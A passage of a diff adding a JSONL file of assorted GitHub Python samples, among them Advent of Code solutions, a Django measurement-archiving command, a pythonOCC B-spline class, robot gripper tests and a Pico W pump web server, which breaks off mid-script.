diff --git "a/2453.jsonl" "b/2453.jsonl" new file mode 100644--- /dev/null +++ "b/2453.jsonl" @@ -0,0 +1,1477 @@ +{"seq_id":"5356058332","text":"import unittest\nfrom pathlib import Path\n\nfrom src import load_data\nfrom src.day06 import DatastreamBuffer, parse\n\n\nclass Day06Tests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.examples = [\n parse(d)\n for d in load_data(Path(__file__).parent / \"resources/day06/example.txt\")\n ]\n cls.input = parse(\n load_data(Path(__file__).parent / \"../src/day06/input.txt\")[0]\n )\n\n def test_load_example(self):\n self.assertEqual(\n self.examples,\n [\n DatastreamBuffer(\"mjqjpqmgbljsphdztnvjfqwrcgsmlb\"),\n DatastreamBuffer(\"bvwbjplbgvbhsrlpgdmjqwftvncz\"),\n DatastreamBuffer(\"nppdvjthqldpwncqszvftbrmjlhg\"),\n DatastreamBuffer(\"nznrnfrfntjfmvfwmzdfjlvtqnbhcprsg\"),\n DatastreamBuffer(\"zcfzfwzzqfrljwzlrfnpqdbhtmscgvjw\"),\n ],\n )\n\n def test_first_start_of_packet_marker(self):\n self.assertEqual(\n [ex.first_start_of_packet_marker for ex in self.examples], [7, 5, 6, 10, 11]\n )\n\n def test_first_start_of_message_marker(self):\n self.assertEqual(\n [ex.first_start_of_message_marker for ex in self.examples],\n [19, 23, 23, 29, 26],\n )\n\n def test_solution(self):\n self.assertEqual(1802, self.input.first_start_of_packet_marker)\n self.assertEqual(3551, self.input.first_start_of_message_marker)\n","repo_name":"tysonmcnulty/advent-of-code-2022","sub_path":"tests/test_day06.py","file_name":"test_day06.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42305491992","text":"import numpy as np\n\n\ndef movement(direction, distance):\n #will return (depth change ,horizontal change) dependent\n #on direction/distance\n travelled = int(distance)\n if direction == \"down\":\n return (travelled * 1, 0)\n elif direction == \"up\":\n return (travelled * -1, 0)\n elif direction == \"forward\":\n return (0, travelled)\n else:\n return (0,0)\n\ndepth = 0\nhorizontal = 0\ninput = 'd2_input.txt'\nmy_file_handle=open(input)\ndata = my_file_handle.read().split('\\n')\n\nformat_data = [line.split() for line in data]\nformat_data.pop()\nprint(format_data)\n #formats to [distance,change]\nfor dir,dist in format_data:\n depth_change, horiz_change = movement(dir,dist)\n depth += depth_change \n horizontal += horiz_change\nprint((horizontal*depth))\n","repo_name":"connorjsullivan/advent-of-code-2021","sub_path":"d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17567079299","text":"with open(\"text.txt\",\"r\") as file,open('result.txt','w') as result:\n index = 1\n marks = {'.','?','!',',',':',';','-','-','‘',\"'\"}\n lines = file.read().splitlines()\n for line in lines:\n letters = 0\n punctuation_marks = 0\n for ch in line:\n if ch in marks:\n punctuation_marks+=1\n elif ch.isalpha():\n letters+=1\n result.write (f\"Line {index}: {line.strip()} ({letters})({punctuation_marks})\")\n result.write('\\n')\n index+=1","repo_name":"ilias511/Advanced","sub_path":"file_handling_line_nums/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40953274871","text":"import sys\nfrom unittest import TextTestRunner, TestLoader\nfrom tests.settings import set_up, tear_down\n\ntest_file_pattern = 'test*.py'\n\nif len(sys.argv) == 2:\n test_file_pattern = 'test*{}*.py'.format(sys.argv[1])\n\nset_up()\n\ntest_suite = TestLoader().discover('tests', pattern=test_file_pattern, top_level_dir='.')\nrunner = TextTestRunner(stream=sys.stdout, verbosity=1)\nresult = runner.run(test_suite)\n\ntear_down()\n\nsys.exit(len(result.failures))\n","repo_name":"R0land013/blue-pos","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"9696733794","text":"from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ed25519\n\n# sender: hexadecimal representation of the public key of the sender\n# recipient: hexadecimal representation of the public key of the recipient\n# amount: amount of coins to be transferred\n# signature: hexadecimal representation of the signature of the transaction\nclass Transaction:\n def __init__(self, sender_adress: str, recipient_adress: str, amount: int, signature: str) :\n self.sender_address = sender_adress\n self.recipient_address = recipient_adress\n self.amount = amount\n self.signature = signature\n \n def serialize(self):\n return {\n \"sender_address\": self.sender_address,\n \"recipient_address\": self.recipient_address,\n \"amount\": self.amount,\n \"signature\": self.signature\n }","repo_name":"tpicaud/put-blockchain-implementation","sub_path":"wallet/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30074575928","text":"#!/usr/bin/env python\n\nfrom pybuiltingrapher import graph, create_fake\nfrom pybuiltingrapher.stdlib_modules import modules\n\nimport argparse\nimport json\nimport sys\nimport os\n\n# Command Line invocation\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Grapher for modules in python standard lib, intended to be used for modules written in C.\")\n parser.add_argument(\"cpythondir\", help=\"The root directory of the CPython repository. Should have a Modules folder in it.\")\n parser.add_argument(\"--skipinternal\", help=\"Include modules whose names start with an underscore.\", action=\"store_true\")\n\n parser.add_argument(\"--generatefakes\", help=\"Creates fake .py modules that mimics the builtin - for tricking PySonar.\", action=\"store_true\")\n parser.add_argument(\"--fakesdir\", help=\"Directory in which to place the fake py modules. Default: cpythondir/Fakes/\", type=str, default=None)\n\n args = parser.parse_args()\n\n symbols = []\n docs = []\n refs = []\n\n # Setup directory for generating fakes\n if args.fakesdir == None:\n args.fakesdir = args.cpythondir + '/Fakes/'\n if args.generatefakes:\n if not os.path.exists(args.fakesdir):\n os.makedirs(args.fakesdir)\n\n for module,filename in modules.items():\n #If skipinternal flag was not passed, skip modules starting with an underscore\n if args.skipinternal and module[0] == \"_\":\n continue\n\n try:\n module_symbols, module_docs, module_refs = graph(module, args.cpythondir, filename)\n\n if args.generatefakes:\n f = open(args.fakesdir + module + \".py\", 'w')\n f.write(create_fake(module))\n f.close()\n except:\n # If error occured, simply ignore module\n sys.stderr.write(str(sys.exc_info()) + \"\\n\")\n pass\n else:\n symbols.extend(module_symbols)\n docs.extend(module_docs)\n refs.extend(module_refs)\n\n print(json.dumps({\n \"Symbols\" : symbols,\n \"Docs\" : docs,\n \"Refs\" : refs\n }))\n","repo_name":"pombreda/pybuiltingrapher","sub_path":"graphstdlib.py","file_name":"graphstdlib.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4850927286","text":"from .sketch_geometry import *\nfrom .sketch_point import Sketch_Point\n\n\nclass Sketch_Bspline(Sketch_Geometry):\n IndexCounter = 0\n\n def __init__(self, theContext, theAxis):\n super(Sketch_Bspline, self).__init__(\"Bspline\", theContext, theAxis)\n Sketch_Bspline.IndexCounter += 1\n self.myName = \"Bspline\" + str(self.IndexCounter)\n self.myGeometry: Geom_BSplineCurve = None\n self.myGeometry2d: Geom2d_BSplineCurve = None\n self.myAIS_InteractiveObject: AIS_Shape = None\n self.myAIS_Lines = []\n self.myPoles = []\n self.myWeights = []\n self.myKnots = []\n self.myMultiplicities = []\n self.myDegree = 2\n self.myPeriodicFlag = False\n self.TypeInterpolation = False\n\n def AddPoles(self, thePnt2d, weight=1.0):\n # set poles\n sketch_point = Sketch_Point(self.myContext, self.curCoordinateSystem)\n sketch_point.Compute(thePnt2d)\n # auxiliry lines\n if len(self.myPoles) >= 1:\n ais_line: AIS_Line = AIS_Line(self.myPoles[-1].GetGeometry(), sketch_point.GetGeometry())\n ais_line.SetAttributes(self.myDrawer)\n self.myAIS_Lines.append(ais_line)\n self.myContext.Display(ais_line, True)\n # set weight\n self.myPoles.append(sketch_point)\n self.myWeights.append(weight)\n\n def RemoveDisplay(self):\n super(Sketch_Bspline, self).RemoveDisplay()\n for point in self.myPoles:\n point.RemoveDisplay()\n for line in self.myAIS_Lines:\n self.myContext.Remove(line, True)\n\n def Compute(self):\n arrayOfWeights = float_list_to_TColStd_Array1OfReal(self.myWeights)\n arrayOfKnots = float_list_to_TColStd_Array1OfReal(self.myKnots)\n arrayOfMulties = int_list_to_TColStd_Array1OfInteger(self.myMultiplicities)\n\n poles2d_list = [pole.GetGeometry2d().Pnt2d() for pole in self.myPoles]\n arrayOfPoles2d = point_list_to_TColgp_Array1OfPnt2d(poles2d_list)\n self.myGeometry2d = Geom2d_BSplineCurve(arrayOfPoles2d, arrayOfWeights, arrayOfKnots, arrayOfMulties,\n self.myDegree)\n\n poles_list = [pole.GetGeometry().Pnt() for pole in self.myPoles]\n arrayOfPoles = point_list_to_TColgp_Array1OfPnt(poles_list)\n self.myGeometry = Geom_BSplineCurve(arrayOfPoles, arrayOfWeights, arrayOfKnots, arrayOfMulties, self.myDegree)\n edge = BRepBuilderAPI_MakeEdge(self.myGeometry)\n if self.myAIS_InteractiveObject:\n self.myAIS_InteractiveObject.SetShape(edge.Edge())\n self.myAIS_InteractiveObject.Redisplay(True)\n else:\n self.myAIS_InteractiveObject = AIS_Shape(edge.Edge())\n self.myAIS_InteractiveObject.SetAttributes(self.myDrawer)\n self.myContext.Display(self.myAIS_InteractiveObject, True)\n\n def FromShape(self, theGeom: Geom_BSplineCurve, theShape):\n self.myGeometry = theGeom\n\n myPoles = TColgp_Array1OfPnt2d_to_point_list(self.myGeometry.Poles())\n poles2d_list = [projectPointOnPlane(pole, self.curCoordinateSystem) for pole in myPoles]\n arrayOfPoles2d = point_list_to_TColgp_Array1OfPnt2d(poles2d_list)\n\n for pnt2d in poles2d_list:\n self.AddPoles(pnt2d)\n if self.myGeometry.IsRational()==True:\n arrayOfWeights=self.myGeometry.Weights()\n else:\n arrayOfWeights = float_list_to_TColStd_Array1OfReal(self.myWeights)\n arrayOfKnots = self.myGeometry.Knots()\n arrayOfMulties = self.myGeometry.Multiplicities()\n degree=self.myGeometry.Degree()\n\n self.myGeometry2d = Geom2d_BSplineCurve(arrayOfPoles2d, arrayOfWeights, arrayOfKnots, arrayOfMulties,degree)\n\n self.myAIS_InteractiveObject = AIS_Shape(theShape)\n self.myAIS_InteractiveObject.SetAttributes(self.myDrawer)\n self.myContext.Display(self.myAIS_InteractiveObject, True)\n\n def ComputeInterpolation(self):\n self.TypeInterpolation = True\n poles2d_list = [pole.GetGeometry2d().Pnt2d() for pole in self.myPoles]\n arrayOfPoles2d = point_list_to_TColgp_Array1OfPnt2d(poles2d_list)\n self.myGeometry2d = Geom2dAPI_PointsToBSpline(arrayOfPoles2d)\n if self.myGeometry2d.IsDone():\n self.myGeometry2d = self.myGeometry2d.Curve()\n poles_list = [pole.GetGeometry().Pnt() for pole in self.myPoles]\n arrayOfPoles = point_list_to_TColgp_Array1OfPnt(poles_list)\n self.myGeometry = GeomAPI_PointsToBSpline(arrayOfPoles)\n if self.myGeometry.IsDone():\n self.myGeometry = self.myGeometry.Curve()\n edge = BRepBuilderAPI_MakeEdge(self.myGeometry)\n if self.myAIS_InteractiveObject:\n self.myAIS_InteractiveObject.SetShape(edge.Edge())\n self.myAIS_InteractiveObject.Redisplay(True)\n else:\n self.myAIS_InteractiveObject = AIS_Shape(edge.Edge())\n self.myAIS_InteractiveObject.SetAttributes(self.myDrawer)\n self.myContext.Display(self.myAIS_InteractiveObject, True)\n\n def DragTo(self, index, newPnt2d):\n self.myPoles[index].DragTo(newPnt2d)\n if self.TypeInterpolation:\n self.ComputeInterpolation()\n else:\n self.myPoles[index].DragTo(newPnt2d)\n pole2d = self.myPoles[index].GetGeometry2d().Pnt2d()\n pole = self.myPoles[index].GetGeometry().Pnt()\n self.myGeometry2d.SetPole(index + 1, pole2d, self.myWeights[index])\n self.myGeometry.SetPole(index + 1, pole, self.myWeights[index])\n self.myAIS_InteractiveObject.Redisplay(True)\n for line in self.myAIS_Lines:\n line.Redisplay(True)\n\n def Recompute(self):\n poles2d_list = [pole.GetGeometry2d().Pnt2d() for pole in self.myPoles]\n poles_list = [pole.GetGeometry().Pnt() for pole in self.myPoles]\n for index, pole2d in enumerate(poles2d_list):\n self.myGeometry2d.SetPole(index + 1, pole2d, self.myWeights[index])\n self.myGeometry.SetPole(index + 1, poles_list[index], self.myWeights[index])\n for index, knots in enumerate(self.myKnots):\n try:\n self.myGeometry2d.SetKnot(index + 1, knots, self.myMultiplicities[index])\n self.myGeometry.SetKnot(index + 1, knots, self.myMultiplicities[index])\n except Exception as e:\n break\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def IncreaseDegree(self, theDegree):\n if theDegree < self.myGeometry2d.Degree():\n print(\"Degree elevation: degree can't be lower than 2 or lower than current degree\")\n else:\n self.RemoveLabel()\n self.myGeometry2d.IncreaseDegree(theDegree)\n self.myGeometry.IncreaseDegree(theDegree)\n self.myDegree = theDegree\n self.updateGeomAttributes()\n self.DisplayName()\n self.DisplayCoordinate()\n self.DisplayAuxiliryLine()\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def IncreaseMultiplicity(self, theIndex, theMulti):\n self.myGeometry2d.IncreaseMultiplicity(theIndex, theMulti)\n self.myGeometry.IncreaseMultiplicity(theIndex, theMulti)\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def updateGeomAttributes(self):\n poles2d_array = self.myGeometry2d.Poles()\n poles2d_list = TColgp_Array1OfPnt2d_to_point_list(poles2d_array)\n\n knots_array = self.myGeometry2d.Knots()\n multiplicity = self.myGeometry2d.Multiplicities()\n self.myKnots = TColStd_Array1OfNumber_to_list(knots_array)\n self.myMultiplicities = TColStd_Array1OfNumber_to_list(multiplicity)\n self.myPoles.clear()\n self.myWeights.clear()\n self.myAIS_Lines.clear()\n for new_point in poles2d_list:\n self.AddPoles(new_point)\n\n def SetPeriodic(self):\n if self.myGeometry2d.IsPeriodic() == False:\n self.myGeometry2d.SetPeriodic()\n self.myGeometry.SetPeriodic()\n else:\n self.myGeometry2d.SetNotPeriodic()\n self.myGeometry.SetNotPeriodic()\n self.RemoveLabel()\n self.updateGeomAttributes()\n # display the last lines\n if not self.myPoles[-1].GetGeometry().Pnt().IsEqual(self.myPoles[0].GetGeometry().Pnt(),pow(10,-6)):\n self.myContext.Remove(self.myAIS_Lines[-1], True)\n ais_line: AIS_Line = AIS_Line(self.myPoles[-1].GetGeometry(), self.myPoles[0].GetGeometry())\n ais_line.SetAttributes(self.myDrawer)\n self.myAIS_Lines.append(ais_line)\n self.myContext.Display(ais_line, True)\n self.DisplayName()\n self.DisplayCoordinate()\n self.DisplayAuxiliryLine()\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def RemoveAIS_Lines(self):\n # remove auxiliry line\n for point in self.myPoles:\n point.RemoveDisplay()\n for line in self.myAIS_Lines:\n self.myContext.Remove(line, True)\n\n def GetGeometryType(self):\n return Sketch_GeometryType.CurveSketchObject\n\n def GetTypeOfMethod(self):\n return Sketch_ObjectTypeOfMethod.BSpline_Method\n\n def ChangeWeights(self, index, weight):\n self.myWeights[index] = weight\n\n def SetWeights(self, weights):\n self.myWeights = weights\n\n def GetWeights(self):\n return self.myWeights\n\n def SetMultiplicities(self, theMulti):\n self.myMultiplicities = theMulti\n\n def SetKnots(self, theKnots):\n self.myKnots = theKnots\n\n def GetKnots(self):\n return self.myKnots\n\n def SetMulties(self, theMulties):\n self.myMultiplicities = theMulties\n\n def ChangeMulties(self, index, multi):\n self.myMultiplicities[index] = multi\n\n def GetMulties(self):\n return self.myMultiplicities\n\n def GetPoles(self):\n return self.myPoles\n\n def SetPoles(self, thePoles):\n self.myPoles = list(thePoles)\n\n def SetDegree(self, theDegree):\n self.myDegree = theDegree\n\n def GetDegree(self):\n return self.myDegree\n\n def SetKnotsType(self, theType: int):\n # Non uniform type\n if theType == 0:\n pass\n # Uniform: if all the knots are of multiplicity 1,\n elif theType == 1:\n self.myMultiplicities, self.myKnots = setUniformKnots(len(self.myPoles), self.myDegree)\n # QuasiUniform: if all the knots are of multiplicity 1 except for the first and last knot which are of multiplicity Degree + 1,\n elif theType == 2:\n self.myMultiplicities, self.myKnots = setQuasiUniformKnots(len(self.myPoles), self.myDegree)\n # PiecewiseBezier: if the first and last knots have multiplicity Degree + 1 and if interior knots have multiplicity Degree A piecewise Bezier with only two knots is a BezierCurve. else the curve is non uniform.\n elif theType == 3:\n if len(self.myPoles) < 5:\n raise ValueError(\"Number of Poles must be greater than 5!\")\n else:\n self.myMultiplicities, self.myKnots = setPiecewiseBezierKnots(len(self.myPoles), self.myDegree)\n self.Compute()\n\n def DisplayName(self):\n if self.showViewportName:\n for point in self.myPoles:\n self.myContext.Display(point.myAIS_Name, True)\n else:\n for point in self.myPoles:\n self.myContext.Erase(point.myAIS_Name, True)\n\n def DisplayCoordinate(self):\n if self.showViewportCoordinate:\n for point in self.myPoles:\n self.myContext.Display(point.myAIS_Coordinate, True)\n else:\n for point in self.myPoles:\n self.myContext.Erase(point.myAIS_Coordinate, True)\n\n def DisplayAuxiliryLine(self):\n if self.showVieportAuxilirayLine:\n for point in self.myPoles:\n self.myContext.Display(point.GetAIS_Object(), True)\n for line in self.myAIS_Lines:\n self.myContext.Display(line, True)\n else:\n for point in self.myPoles:\n self.myContext.Erase(point.GetAIS_Object(), True)\n for line in self.myAIS_Lines:\n self.myContext.Erase(line, True)\n\n def GetStyle(self):\n return self.myWireStyle\n\n def SetStyle(self, theStyle):\n self.myWireStyle = theStyle\n self.myWireAspect.SetTypeOfLine(theStyle)\n\n def GetWidth(self):\n return self.myWireWidth\n\n def SetWidth(self, theWidth):\n self.myWireWidth = theWidth\n self.myWireAspect.SetWidth(theWidth)\n\n def GetColor(self):\n return self.myWireColor\n\n def SetColor(self, theColor):\n self.myWireColor = theColor\n self.myWireAspect.SetColor(Quantity_Color(theColor))\n\n def RemoveLabel(self):\n for point in self.myPoles:\n point.RemoveDisplay()\n point.RemoveLabel()\n for line in self.myAIS_Lines:\n self.myContext.Remove(line, True)\n","repo_name":"chen1180/CurveEditor_pythonOCC","sub_path":"data/sketch/geometry/sketch_bspline.py","file_name":"sketch_bspline.py","file_ext":"py","file_size_in_byte":12995,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"71230497842","text":"from django.core.management.base import BaseCommand\nfrom django.db.models import (Avg, StdDev, Min, Max, Count, F, FloatField,\n Value as V)\nfrom django.db.models.functions import (TruncDay, TruncMonth, TruncWeek,\n Coalesce, Concat)\nfrom measurement.models import (Measurement, ArchiveDay, ArchiveMonth,\n ArchiveWeek)\nfrom measurement.aggregates.percentile import Percentile\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta, MO\nimport pytz\n\n\nclass Command(BaseCommand):\n \"\"\" Command for creating archive entries\"\"\"\n\n help = 'Archives Measurements for the given time period'\n\n TIME_TRUNCATOR = {\n 'day': TruncDay,\n 'week': TruncWeek,\n 'month': TruncMonth,\n }\n \"\"\"\" Django datetime extractors for dealing with portions of datetimes \"\"\"\n\n DURATIONS = {\n 'day': lambda count: relativedelta(days=count),\n 'week': lambda count: relativedelta(weeks=count),\n 'month': lambda count: relativedelta(months=count),\n }\n \"\"\" functions for generating timesteps of sizes \"\"\"\n\n ARCHIVE_TYPE = {\n 'day': ArchiveDay,\n 'week': ArchiveWeek,\n 'month': ArchiveMonth\n }\n \"\"\" Types of archive \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument('archive_type',\n choices=['day', 'week', 'month'],\n help=('The granularity of the desired archive '\n '(i.e. day, week, month, etc.)'))\n parser.add_argument('--period_end',\n type=lambda s: pytz.utc.localize(\n datetime.strptime(s, \"%m-%d-%Y\")),\n nargs='?',\n default=datetime.now(tz=pytz.utc).replace(\n hour=0, minute=0, second=0, microsecond=0),\n help=('The end of the archiving period, '\n 'non-inclusive (format: mm-dd-yyyy)'))\n parser.add_argument('--metric', action='append',\n help='id of the metric to be archived',\n default=[])\n parser.add_argument('--no-overwrite', dest='overwrite',\n action='store_false')\n parser.add_argument('--overwrite', dest='overwrite',\n action='store_true')\n\n def handle(self, *args, **kwargs):\n # extract args\n archive_type = kwargs['archive_type']\n metrics = kwargs['metric']\n overwrite = kwargs['overwrite']\n period_end = kwargs['period_end']\n # in order to make archives for longer periods use backfill_archives,\n # which calls this command\n period_size = 1\n period_start = period_end - self.DURATIONS[archive_type](period_size)\n\n if archive_type == 'month':\n # if archive_type is month, adjust period start/end to go from 1st\n # day of the month\n period_end = period_end.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0)\n period_start = period_start.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0)\n elif archive_type == 'week':\n # if archive_type is week, adjust period start/end to go from\n # Monday of the given week\n period_end += relativedelta(hour=0, minute=0, second=0,\n microsecond=0, weekday=MO(-1))\n period_start += relativedelta(hour=0, minute=0, second=0,\n microsecond=0, weekday=MO(-1))\n\n # filter measurements down to time range\n measurements = Measurement.objects.filter(\n starttime__gte=period_start, starttime__lt=period_end)\n\n # if specific metrics were selected, filter for them\n if len(metrics) != 0:\n measurements = measurements.filter(metric__id__in=metrics)\n\n # get archives for same time period, to compare with measurements\n archives = self.ARCHIVE_TYPE[archive_type].objects.filter(\n starttime__gte=period_start, starttime__lt=period_end)\n\n # if overwriting archives, designate old ones to delete. Otherwise,\n # check to make sure we are only writing new ones\n if overwrite:\n n_archives_to_ignore = 0\n archives_to_delete = archives\n if len(metrics) != 0:\n archives_to_delete = archives_to_delete.filter(\n metric_id__in=metrics)\n else:\n # exclude measurements that already have archives. This only works\n # correctly for a single time period\n archive_key = archives.annotate(\n m_c=Concat('metric_id', V(' '), 'channel_id')).values('m_c')\n measurements = measurements.annotate(\n m_c=Concat('metric_id', V(' '), 'channel_id')).exclude(\n m_c__in=archive_key)\n # make sure we don't delete any old archives\n archives_to_delete = self.ARCHIVE_TYPE[archive_type].objects.none()\n n_archives_to_ignore = len(archive_key)\n\n # get the data to be archived\n archive_data = self.get_archive_data(measurements, archive_type)\n\n # delete old archives\n deleted_archives = archives_to_delete.delete()\n\n # create the archive entries\n created_archives = self.ARCHIVE_TYPE[archive_type].objects.bulk_create(\n [self.ARCHIVE_TYPE[archive_type](**archive)\n for archive in archive_data])\n\n # report back to user\n self.stdout.write(\n f\"Deleted {deleted_archives[0]}, \"\n f\"ignored {n_archives_to_ignore}, and \"\n f\"created {len(created_archives)} \"\n f\"{archive_type} archives \"\n f\"from {format(period_start, '%m-%d-%Y')} \"\n f\"to {format(period_end, '%m-%d-%Y')}\"\n )\n\n def get_archive_data(self, qs, archive_type):\n \"\"\" returns archives given a queryset \"\"\"\n # group on metric,channel, and time\n grouped_measurements = qs.annotate(\n # first truncate starttime to day/month so we can group on it\n time=self.TIME_TRUNCATOR[archive_type]('starttime')) \\\n .values('metric', 'channel', 'time')\n\n # calculate archive stats\n archive_data = grouped_measurements.annotate(\n mean=Avg('value'),\n median=Percentile('value', percentile=0.5),\n min=Min('value'),\n max=Max('value'),\n stdev=Coalesce(StdDev('value', sample=True), 0,\n output_field=FloatField()),\n num_samps=Count('value'),\n starttime=Min('starttime'),\n endtime=Max('endtime'),\n # add _id suffix to fields so they can be assigned to\n # Archive's fk directly\n metric_id=F('metric'),\n channel_id=F('channel'),\n p05=Percentile('value', percentile=0.05),\n p10=Percentile('value', percentile=0.10),\n p90=Percentile('value', percentile=0.90),\n p95=Percentile('value', percentile=0.95)\n )\n\n # select only columns that will be stored in Archive model\n filtered_archive_data = archive_data.values(\n 'channel_id', 'metric_id', 'min', 'max', 'mean',\n 'median', 'stdev', 'p05', 'p10', 'p90', 'p95',\n 'num_samps', 'starttime', 'endtime')\n\n return filtered_archive_data\n","repo_name":"pnsn/squacapi","sub_path":"app/measurement/management/commands/archive_measurements.py","file_name":"archive_measurements.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"2749216994","text":"# Create a dictionary named ProtocolsDict that will hold the following keys and values: {FTP: 21, DNS: 53, LDAP: 389, MySQL: 3306}\nprint(\"This program will display the port number of a given protocol.\\n\")\n\nProtocolsDict = {'FTP':'21', 'DNS':'53', 'LDAP':'389', 'MySQL':'3306'}\n# Create a variable named question that will ask the user for the name of a service using the input() function.\nquestion = input(\"For which protocol would you like to know the port number? \").upper() # upper() converts lowercase to uppercase\n# Create a condition to check if the value in the question variable exists in the dictionary.\n# It should be checked against the dictionary’s key list.\nif question in ProtocolsDict.keys():\n # Select a value from the dictionary with the question variable as a key\n answer = ProtocolsDict[question]\n # Print a message displaying the port associated with the selected service.\n print(\"The port number for protocol \" + question + \" is \" + answer + \"!\")\n# Finally, if the condition is not met, print a message that states that the protocol cannot be found.\nelse:\n print(\"The protocol can't be found\")\n","repo_name":"marcusacylar/course-labs","sub_path":"protocoldict.py","file_name":"protocoldict.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25115004100","text":"import time\n\nfrom cloth_manipulation.hardware.setup_hardware import setup_victor_louise\n\nvictor_louise = setup_victor_louise()\n\nvictor = victor_louise.left\nlouise = victor_louise.right\n\n\ndef check_gripper_and_motion(robot):\n # Check robot gripper\n robot.gripper.close()\n robot.gripper.open()\n\n # Check robot move to home\n robot.move_tcp(robot.home_pose)\n\n # Check robot move linear to out of way\n robot.move_tcp_linear(robot.out_of_way_pose, robot.LINEAR_SPEED, robot.LINEAR_ACCELERATION)\n\n\ncheck_gripper_and_motion(victor)\ncheck_gripper_and_motion(louise)\n\nvictor_louise.dual_gripper_close()\ntime.sleep(1)\nvictor_louise.dual_gripper_move_to_position(0.6)\ntime.sleep(1)\nvictor_louise.dual_gripper_open()\n\n\n# Check synchronous movement\nvictor_louise.dual_move_tcp(victor.home_pose, louise.home_pose)\nvictor_louise.dual_move_tcp(victor.out_of_way_pose, louise.out_of_way_pose)\n","repo_name":"Victorlouisdg/iros-2022-cloth-competition","sub_path":"cloth-manipulation/test/test_victor_louise.py","file_name":"test_victor_louise.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"30301173309","text":"import os,ROOT,math,array\n\nclass HistHelper(object):\n\tdef make_binning_with_stat_unc(self,inHists,statUnc):\n\t\tif len(inHists) == 0: raise RuntimeError\n\t\tnBins = inHists[0].GetNbinsX()\n\t\tbinContentDict = {}\n\t\tbinErrorDict = {}\n\t\tfor iHist,inHist in enumerate(inHists):\n\t\t\tbinContentDict[iHist] = 0.\n\t\t\tbinErrorDict[iHist] = 0.\n\n\t\txbins = []\n\t\tfor iBin in range(1,nBins+1):\n\t\t\tfor iHist,inHist in enumerate(inHists):\n\t\t\t\tbinContentDict[iHist] += inHist.GetBinContent(nBins+1-iBin)\n\t\t\t\tbinErrorDict[iHist] += inHist.GetBinError(nBins+1-iBin)**2\n\t\t\tif all([ binContent > 0. and math.sqrt(binErrorDict[iHist])/binContent <= statUnc for iHist,binContent in binContentDict.iteritems() ]):\n\t\t\t\tfor iHist,inHist in enumerate(inHists):\n\t\t\t\t\tbinContentDict[iHist] = 0.\n\t\t\t\t\tbinErrorDict[iHist] = 0.\n\t\t\t\txbins.append(inHists[0].GetXaxis().GetBinLowEdge(nBins+1-iBin))\n\t\tif xbins[-1] != 0: xbins.append(0.)\n\t\treturn xbins[::-1]\n\n\tdef convert_list_to_array(self,list):\n\t\treturn array.array('d',list)\n\n","repo_name":"lucien1011/PyNTupleProcessor","sub_path":"LJMet/StatTools/HistHelper.py","file_name":"HistHelper.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11863649839","text":"import random\n\nclass Canvas:\n def __init__(self, height = 500, width = 500, density = 0.5, seed = 0):\n\n self.height = height\n self.width = width\n\n if seed != 0:\n random.seed(seed)\n else:\n random.seed()\n \n self.pixels = [[(1 if random.randint(1, int(1/density)) == 1 else 0) for i in range(0, self.height)] for j in range(0, self.width)]\n\n def step(self, automata):\n def calculate_pixel(i, j):\n internal_sum = 0\n for offset_y in range(-1,2):\n for offset_x in range(-1,2):\n if i + offset_y >= 0 and i + offset_y= 0 and j + offset_x 0:\n if wlan.status() < 0 or wlan.status() >= 3:\n break\n max_wait -= 1\n print('waiting for connection...')\n time.sleep(1)\n\n# Handle connection error\nif wlan.status() != 3:\n raise RuntimeError('network connection failed')\nelse:\n print('connected')\n status = wlan.ifconfig()\n print( 'ip = ' + status[0] )\n \n# Open socket\naddr = socket.getaddrinfo('0.0.0.0', 80)[0][-1]\n \ns = socket.socket()\ns.bind(addr)\ns.listen(1)\n \nprint('listening on', addr)\n\nstateis = \"\"\n \n# Listen for connections\nwhile True:\n try:\n cl, addr = s.accept()\n print('client connected from', addr)\n\n request = cl.recv(1024)\n\n request = str(request)\n led_on = request.find('/unpeu') # Variable based on the html link\n led_off = request.find('/beaucoup') # Variable based on the html link\n #print( 'led on = ' + str(led_on))\n #print( 'led off = ' + str(led_off))\n\n if led_on == 6:\n print(\"2 sec\")\n intled.value(1)\n pompe.value(1)\n utime.sleep(3)\n pompe.value(0)\n intled.value(0)\n stateis = \"La pompe fonctionne pendant 3 secondes\"\n\n elif led_off == 6:\n intled.value(1)\n pompe.value(1)\n utime.sleep(5)\n pompe.value(0)\n intled.value(0)\n stateis = \"La pompe fonctionne pendant 5 secondes\"\n \n response = html + 